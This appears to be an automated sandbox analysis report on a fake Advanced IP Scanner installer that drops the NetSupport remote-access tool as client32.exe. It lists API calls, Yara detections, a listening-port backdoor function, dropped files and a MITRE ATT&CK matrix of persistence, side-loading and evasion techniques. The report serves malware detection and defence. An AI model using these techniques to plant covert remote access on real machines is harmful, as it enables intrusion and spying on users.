Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	7_2_685CDB7C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_685CDC56
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_685C1CC1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	7_2_685CDC99
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_685C1DB6
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_685C1E5D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_685C1EB8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	8_2_1117053C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	8_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_11170011
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170500
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170499

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1101D180 __time64,SetRect,GetLocalTime,

7_2_1101D180

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,

7_2_1103B220

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_1109D4A0

Remote Access Functionality

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_6859A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,

7_2_6859A980

Yara detected NetSupport remote tool

Source: Yara match	File source: 7.2.client32.exe.688b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.68890000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.68590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2158956147.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2248759340.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2240623467.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2248546826.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2160400872.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3639184086.0000000002572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 1832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	11 Software Packing	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	11 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Search Order Hijacking	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Masquerading	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	31 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Advanced_IP_Scanner_2.5.4594.12.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	0%	ReversingLabs
